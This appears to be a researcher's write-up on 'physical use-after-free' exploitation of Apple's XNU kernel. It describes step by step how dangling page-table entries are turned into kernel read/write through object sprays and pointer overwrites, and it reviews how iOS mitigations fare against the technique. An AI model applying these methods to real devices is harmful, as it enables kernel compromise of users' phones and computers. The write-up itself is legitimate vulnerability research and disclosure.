- What is a PUAF primitive?
- What to do before a PUAF exploit?
- What to do after a PUAF exploit?
- Impact of XNU mitigations on PUAF exploits
- Appendix: Discovery of the PUAF primitive
PUAF is an acronym for "physical use-after-free". As opposed to a normal UAF, which stems from a
dangling pointer to a virtual address (VA), a PUAF originates from a dangling pointer to the
physical address (PA) of a memory region. Although PA pointers could be stored in other kernel data
structures, here it will be assumed that the dangling PA pointer is contained directly in a
leaf-level page table entry (i.e. an L3 PTE in the case of iOS and macOS) from the page table
hierarchy of the exploiting user process. In addition, in order to qualify as a PUAF primitive, it
will also be assumed that the corresponding physical page has been put back on the free list. In
XNU, every physical page of memory is represented by a vm_page
structure, whose vmp_q_state
field determines which queue the page is on, and whose vmp_pageq
field contains 32-bit packed
pointers to the next and previous pages in that queue. Note that the main "free list" in XNU is
represented by vm_page_queue_free
, which is an array of MAX_COLORS
(128) queues (although the
actual number of free queues used depends on the device configuration). Finally, although a dangling
PTE with read-only access in the AP bits (e.g. P0 issue 2337) would still be considered an
important security vulnerability, it would not be directly exploitable. Therefore, in this write-up,
a PUAF primitive entails that the dangling PTE gives read/write access to user space in the AP bits.
To summarize, in order to obtain a PUAF primitive, we must achieve a dangling L3 PTE with read/write
access on a physical page which has been put back on the free list, such that the kernel can grab it
and reuse it for absolutely anything!
As mentioned above, once a PUAF primitive has been achieved, the corresponding physical pages could
be reused for anything. However, if the higher-privileged Page Protection Layer (PPL) is running out
of free pages in pmap_ppl_free_page_list
, the regular kernel might grab pages from its own free
queues and give them to PPL by calling pmap_mark_page_as_ppl_page_internal()
. That said, this PPL
routine will verify that the given page is indeed not mapped outside of the physical aperture, or
else it will trigger a "page still has mappings" panic. But since a PUAF primitive requires a
dangling PTE, this check would always fail and cause a kernel panic. Therefore, after obtaining PUAF
pages, we must avoid marking them as PPL-owned. Hence, before starting a PUAF exploit, we should
attempt to fill pmap_ppl_free_page_list
as much as possible, such that PPL is less likely to run
out of free pages during the critical section of the exploit. Fortunately, we can easily allocate
PPL-owned pages by calling vm_allocate()
with the flag VM_FLAGS_FIXED
for all addresses aligned
to the L2 block size inside the allowed VA range of our VM map. If there were previously no mappings
in that L2 block size, then PPL will first need to allocate an L3 translation table to accomodate
the new mapping. Then, we can simply deallocate those mappings and PPL will put the empty L3
translation table pages back in pmap_ppl_free_page_list
. This is done in the function
puaf_helper_give_ppl_pages()
, located in puaf.h.
On macOS, the maximum VA that is mappable by a user process (i.e. current_map()->max_offset
) is
quite high, such that we can fill the PPL page free list with an extremely large number of pages.
However, on iOS, the maximum VA is much lower, such that we can only fill it with roughly 200 pages.
Despite that, I almost never run into the "page still has mappings" panic, even when the exploit is
configured to obtain 2048 PUAF pages, which works great for personal research. Please note that a
higher number of PUAF pages makes it easier for the rest of the exploit to achieve a kernel
read/write primitive. That said, for maximum reliability, if the PUAF exploit is repeatable (e.g.
PhysPuppet), an attacker could instead obtain a PUAF primitive on a smaller number of pages, then
attempt to get the kernel read/write primitive, and repeat the process as needed if the latter part
did not succeed.
Let's suppose that we have successfully exploited a vulnerability to obtain a PUAF primitive on an
arbitrary number of physical pages, now what? Note that free pages are added at the tail of the free
queues by the vm_page_queue_enter()
macro, but there is no way from user space to know exactly
where our PUAF pages are going to be located in those free queues. In order to remedy that, we can
do the following:
- Run some code that will grab a few pages from the free queues and populate them with unique and recognizable content.
- Scan all the PUAF pages for that recognizable content by reading through the dangling PTEs.
- If we find the content, then we have reached the PUAF pages in one of the free queues, so we can move on to the next stage. Otherwise, we go back to step 1 to grab a few more pages, and we repeat this loop until we finally hit the PUAF pages.
This stage of the exploit could probably be optimized tremendously to take into account the fact
that vm_page_queue_free
is made up of an array of free queues. However, as it stands, the exploit
will simply grab free pages in chunks of 4 by calling vm_copy()
on a purgeable source region,
until a quarter of the PUAF pages have been successfully grabbed. This is a gross heuristic that
completely wastes 25% of the PUAF pages, but it has worked exceedingly well for me, so I never had
to optimize it further. This is done in the function krkw_helper_grab_free_pages()
, located in
krkw.h, which I might upgrade in the future.
Now that our PUAF pages are likely to be grabbed, we can turn the PUAF primitive into a more powerful kernel read/write primitive with the following high-level strategy:
- Spray an "interesting" kernel object, such that it is reallocated in one of the remaining PUAF pages.
- Scan the PUAF pages through the dangling PTEs for a "magic value" to confirm the successful reallocation and to identify exactly which PUAF page contains the target kernel object.
- Overwrite a non-PAC'ed kernel pointer in the target kernel object with a fully controlled value, by directly overwriting it through the appropriate dangling PTE. It would also be possible to craft a set of fake kernel objects within the PUAF pages if necessary, but none of the methods described below require that.
- Get a kernel read or kernel write primitive through a syscall that makes use of the overwritten kernel pointer.
For example, in my original exploit for PhysPuppet, I was inspired by SockPuppet and decided to target socket-related objects. Thus, the generic steps listed above would map to the specific actions listed below:
- Spray
inp_tp
structures with thesocket()
syscall. - Scan the PUAF pages for the magic value in the
t_keepintvl
field, which has been set with thesetsockopt()
syscall for theTCP_KEEPINTVL
option. - Overwrite the
inp6_outputopts
field, which is a pointer to aip6_pktopts
structure. - Get a 4-byte kernel read primitive from
inp6_outputopts->ip6po_minmtu
with thegetsockopt()
syscall for theIPV6_USE_MIN_MTU
option, and get a 4-byte kernel write primitive restricted to values between -1 and 255 frominp6_outputopts->ip6po_tclass
with thesetsockopt()
syscall using theIPV6_TCLASS
option.
However, I was not really satisfied with this part of the exploit because the kernel write
primitive was too restricted and the required syscalls (i.e. socket()
and [get/set]sockopt()
)
are all denied from the WebContent sandbox. That said, when I found the vulnerability for Smith,
which was exploitable from WebContent unlike PhysPuppet, I decided to look for other interesting
target kernel objects which could be sprayed from the WebContent sandbox, such that the entire
exploit satisfied that constraint. Unlike for the socket method described above, which used the same
target kernel object for both the kernel read and write primitives, I ended up finding distinct
objects for both primitives.
Here is the description of the
kread_kqueue_workloop_ctl
method:
- Spray
kqworkloop
structures with thekqueue_workloop_ctl()
syscall. - Scan the PUAF pages for the magic value in the
kqwl_dynamicid
field, which has been set directly bykqueue_workloop_ctl()
above. - Overwrite the
kqwl_owner
field, which is a pointer to athread
structure. - Get an 8-byte kernel read primitive from
kqwl_owner->thread_id
with theproc_info()
syscall for thePROC_INFO_CALL_PIDDYNKQUEUEINFO
callnum.
And here is the description of the kwrite_dup
method:
- Spray
fileproc
structures with thedup()
syscall (to duplicate any file descriptor). - This time, no fields can be set to a truly unique magic value for the
fileproc
structure. Therefore, we scan the PUAF pages for the expected bit pattern of the entire structure. Then, we use thefcntl()
syscall with theF_SETFD
cmd to update the value of thefp_flags
field to confirm the successful reallocation and to identify exactly which file descriptor owns thatfileproc
object. - Overwrite the
fp_guard
field, which is a pointer to afileproc_guard
structure. - Get an 8-byte kernel write primitive from
fp_guard->fpg_guard
with thechange_fdguard_np()
syscall. However, that method cannot overwrite a value of 0, nor overwrite any value to 0.
This worked well enough, and at the time of writing, all the syscalls used by those methods are part
of the WebContent sandbox. However, although the proc_info()
syscall is allowed, the
PROC_INFO_CALL_PIDDYNKQUEUEINFO
callnum is denied. Therefore, I had to find another kernel read
primitive. Fortunately, it was pretty easy to find one by looking at the other callnums of
proc_info()
which are allowed by the WebContent sandbox.
Here is the description of the kread_sem_open
method:
- Spray
psemnode
structures with thesem_open()
syscall. - Once again, no fields can be set to a truly unique magic value for the
psemnode
structures. Therefore, we scan the PUAF pages for four consecutive structures, which should contain the samepinfo
pointer in the first 8 bytes and zero padding in the second 8 bytes. Then, we increment thepinfo
pointer by 4 through the dangling PTE and we use theproc_info()
syscall to retrieve the name of the posix semaphore, which should now be shifted by 4 characters when we hit the right file descriptor. - Overwrite the
pinfo
field, which is a pointer to apseminfo
structure. - Get an 8-byte kernel read primitive from
pinfo->psem_uid
andpinfo->psem_gid
with theproc_info()
syscall for thePROC_INFO_CALL_PIDFDINFO
callnum, which is not denied by the WebContent sandbox.
Please note that shm_open()
, which is also part of the WebContent sandbox, could also be used to
achieve a kernel read primitive, in much the same way as sem_open()
. However, sem_open()
makes
it easier to determine the address of current_proc()
through the semaphore's owner
field.
Lastly, the kwrite_sem_open
method works just like
the kwrite_dup
method, but the fileproc
structures are sprayed with the sem_open()
syscall
instead of the dup()
syscall.
At this point, we have a decent kernel read/write primitive, but there are some minor encumbrances:
- The kernel read primitive successfully reads 8 bytes from
pinfo->psem_uid
andpinfo->psem_gid
, but it also reads other fields of thepseminfo
structure located before and after those two. This can cause problems if the address we want to read is located at the very beginning of a page. In that case, the fields beforepsem_uid
andpsem_gid
would end up in the previous virtual page, which might be unmapped and therefore cause a "Kernel data abort" panic. Of course, in such a case, we could use a variant that is guaranteed to not underflow a page by using the first bytes read from the modified kernel pointer. This is done in the functionkread_sem_open_kread_u32()
. - The kernel write primitive cannot overwrite a value of 0, nor overwrite any value to 0. There are
simple workarounds for both scenarios. For example, the function
smith_helper_cleanup()
uses such a workaround to overwrite a value of 0. The workaround to overwrite a value to 0 is left as an exercise for the reader.
Although we can overcome these impediments easily, it would be nice to bootstrap a better kernel
read/write from those initial primitives. This is achieved in perf.h,
but libkfd only supports this part of the exploit on the iPhone 14 Pro Max for certain versions
of iOS (see the supported versions in the function perf_init()
). Currently, I am using some static
addresses from those kernelcaches to locate certain global kernel objects (e.g. perfmon_devices
),
which cannot be found easily by chasing data pointers. It would probably be possible to achieve the
same outcome dynamically by chasing offsets in code, but this is left as an exercise for the reader
for now. As it stands, here is how the setup for the better kernel read/write is achieved:
- We call
vm_allocate()
to allocate a single page, which will be used as a shared buffer between user space and kernel space later on. Note that we also callmemset()
to fault in that virtual page, which will grab a physical page and populate the corresponding PTE. - We call
open("/dev/aes_0", O_RDWR)
to open a file descriptor. Please note that we could open any character device which is accessible from the target sandbox, because we will corrupt it later on to redirect it to"/dev/perfmon_core"
instead. - We use the kernel read primitive to obtain the slid address of the function
vn_kqfilter()
by chasing the pointerscurrent_proc()->p_fd.fd_ofiles[fd]->fp_glob->fg_ops->fo_kqfilter
, where "fd" is the opaque file descriptor returned by theopen()
syscall in the previous step. - We calculate the kernel slide by substracting the slid address of the function
vn_kqfilter()
with the static address of that function in the kernelcache. We then make sure that the base of the kernelcache contains the expected Mach-O header. - We use the kernel read primitive to scan the
cdevsw
array until we find the major index forperfmon_cdevsw
, which seems to always be 0x11. - From the
fileglob
structure we found earlier, we use the kernel read primitive to retrieve the originaldev_t
fromfg->fg_data->v_specinfo->si_rdev
and we use the kernel write primitive to overwrite it such that it indexes intoperfmon_cdevsw
instead. In addition, thesi_opencount
field is incremented by one to preventperfmon_dev_close()
from being called if the process exits before callingkclose()
, which would trigger a "perfmon: unpaired release" panic. - We use the kernel read primitive to retrieve a bunch of useful globals (
vm_pages
,vm_page_array_beginning_addr
,vm_page_array_ending_addr
,vm_first_phys_ppnum
,ptov_table
,gVirtBase
,gPhysBase
andgPhysSize
) as well as TTBR0 fromcurrent_pmap()->ttep
and TTBR1 fromkernel_pmap->ttep
. - We can then manually walk our page tables starting from TTBR0 to find the physical address of the
shared page allocated in step 1. And since we retrieved the
ptov_table
in the previous step, we can then usephystokv()
to find the kernel VA for that physical page inside the physmap. - Finally, we use the kernel write primitive to corrupt the
pmdv_config
field of the first perfmon device to point to the shared page (i.e. with the kernel VA retrieved in the previous step), and to set thepmdv_allocated
boolean field totrue
.
At this point, the setup is complete. To read kernel memory, we can now craft a perfmon_config
structure in the shared page, as shown in the image below, then use the PERFMON_CTL_SPECIFY
ioctl
to read between 1 and 65535 bytes from an arbitrary kernel address. In addition, note that the
region being read must satisfy the zone_element_bounds_check()
in copy_validate()
, because this
technique uses copyout()
under the hood.
To write kernel memory, we can now craft a perfmon_config
, perfmon_source
and perfmon_event
structure in the shared page, as shown in the image below, then use the PERFMON_CTL_ADD_EVENT
ioctl to write 8 bytes to an arbitrary kernel address. That said, at that point, kwrite()
can
accept any size that is a multiple of 8 because it will perform this technique in a loop.
Finally, on kclose()
, the function perf_free()
will restore the si_rdev
and si_opencount
fields to their original values, such that all relevant kernel objects are cleaned up properly when
the file descriptor is closed. However, if the process exits before calling kclose()
, this cleanup
will be incomplete and the next attempt to open("/dev/aes_0", O_RDWR)
will fail with EMFILE
.
Therefore, it would be cleaner to use the kernel write primitive to "manually" close the
device-specific kernel objects of that file descriptor, such that the process could exit at any
moment and still leave the kernel in a clean state. For now, this is left as an exercise for the
reader.
So, how effective were the various iOS kernel exploit mitigations at blocking the PUAF technique?
The mitigations I condisered were KASLR, PAN, PAC, PPL, zone_require()
, and kalloc_type()
:
- KASLR does not really impact this technique since we do not need to leak a kernel address in order to obtain the PUAF primitive in the first place. Of course, we eventually want to obtain the addresses of the kernel objects that we want to read or write, but at that point, we have endless possibilities of objects to spray inside the PUAF pages in order to gather that information.
- PAN also does not really have an impact on this technique. Although none of the kread and kwrite methods I described above required us to craft a set of fake kernel objects, other methods could. In that case, the absence of PAN would be useful. However, in practice, there are plenty of objects that could leak the address of the PUAF pages in kernel space, such that we could craft those fake objects directly in those PUAF pages.
- PAC as a form of control flow integrity is completely irrelevant for this technique as it is a form of data-only attack. That said, in my opinion, PAC for data pointers is the mitigation that currently has the biggest impact on this technique, because there are a lot more kernel objects that we could target in order to obtain a kernel read/write primitive if certain members of those structures had not been signed.
- PPL surprisingly does very little to prevent this technique. Of course, it prevents the PUAF pages from being reused as page tables and other PPL-protected structures. But in practice, it is very easy to dodge the "page still has mappings" panic and to reuse the PUAF pages for other interesting kernel objects. I expect this to change!
zone_require()
has a similar impact as data-PAC for this technique, by preventing us from forging kernel pointers inside the PUAF pages if they are verified with this function.kalloc_type()
is completely irrelevant for this technique as it only provides protection against virtual address reuse, as opposed to physical address reuse.
First of all, I want to be clear that I do not claim to be the first researcher to discover this primitive. As far as I know, Jann Horn of Google Project Zero was the first researcher to publicly report and disclose dangling PTE vulnerabilities:
- P0 issue 2325, reported on June 29, 2022 and disclosed on August 24, 2022.
- P0 issue 2327, reported on June 30, 2022 and disclosed on September 19, 2022.
In addition, TLB flushing bugs could be considered a variant of the PUAF primitive, which Jann Horn found even earlier:
- P0 issue 1633, reported on August 15, 2018 and disclosed on September 10, 2018.
- P0 issue 1695, reported on October 12, 2018 and disclosed on October 29, 2018.
For iOS, I believe Ian Beer was the first researcher to publicly disclose a dangling PTE vulnerability, although with read-only access:
- P0 issue 2337, reported on July 29, 2022 and disclosed on November 25, 2022.
Please note that other researchers might have found similar vulnerabilities earlier, but these are the earliest ones I could find. I reported PhysPuppet to Apple a bit before Ian Beer's issue was disclosed to the public and, at that time, I was not aware of Jann Horn's research. Therefore, in case it is of interest to other researchers, I will share how I stumbled upon this powerful primitive. When I got started doing vulnerability research, during the first half of 2022, I found multiple buffer overflows in the SMBClient kernel extension and a UAF in the in-kernel NFS client (i.e. a normal UAF that reuses a VA and not a PA). However, given that I was pretty unexperienced with exploitation back then and that Apple had already delivered a lot of mitigations for classical memory corruption vulnerabilities, I had no idea how to exploit them. My proofs-of-concept would only trigger "one-click" remote kernel panics, but that quickly became unsatisfying. Therefore, during the second half of 2022, I decided to look for better logic bugs in the XNU kernel. In particular, I was inspired to attack physical memory by Brandon Azad's blog post One Byte to rule them all. That said, his technique required a one-byte linear heap overflow primitive (amongst other things) to gain the arbitrary physical mapping primitive. But I was determined to avoid memory corruption, so I decided to look for other logic bugs that could allow a user process to control the physical address entered in one of its own PTEs. After spending a lot of time reading and re-reading the VM map and pmap code, I eventually came to the conclusion that obtaining an arbitrary physical mapping primitive as an initial primitive would be unrealistic. Fortunately, I got incredibly lucky right after that!
As I was perusing the code in vm_map.c
for the thousandth time, I was struck by just how many
functions would assert that the start and end addresses of a vm_map_entry
structure are
page-aligned (e.g. in vm_map_enter()
, vm_map_entry_insert()
, vm_map_entry_zap()
, and many
other functions). Given that those assertions are not enabled in release builds, I was curious to
know what would happen if we could magically create an "unaligned entry" in our VM map? For example,
if the vme_start
field was equal to a page-aligned address A but the vme_end
field was equal to
A + PAGE_SIZE + 1, how would the functions vm_fault()
and vm_map_delete()
behave? To my
astonishment, I realized that this condition would trivially lead to a dangling PTE. That said, at
that point in time, this was just an idea, albeit a very promising one! Therefore, I went on to look
for logic bugs that could allow an attacker to create such an unaligned entry. First, I investigated
all the attack surface that was reachable from the WebContent sandbox but I was not able to find one.
However, after giving up on a vulnerability reachable from WebContent, I quickly came across the MIG
routine mach_memory_object_memory_entry_64()
and found the vulnerability for PhysPuppet, which is
covered in detail in a separate write-up.
After that, I checked online for existing exploits that achieved a PUAF primitive. At that time, I
could not find any for iOS but that is when I stumbled upon Jann Horn's Mali issues. As a quick
aside, I also skimmed his blog post about exploiting a simple Linux memory corruption bug,
which I mistakenly thought was a variant of the PUAF primitive with a dangling PTE in kernel space
rather than user space. I later realized that this was just a normal UAF, but I got confused because
he exploited it through the page allocator by reallocating the victim page as a page table. That
said, I knew this would not be possible on iOS because of the formidable PPL. However, as I was
already familiar with Ned Williamson's SockPuppet exploit, I had a pretty solid hunch that I
could exploit the dangling PTEs by reallocating socket-related objects inside the PUAF pages, then
by using the getsockopt()
/setsockopt()
syscalls in order to obtain the kernel read/write
primitives, respectively.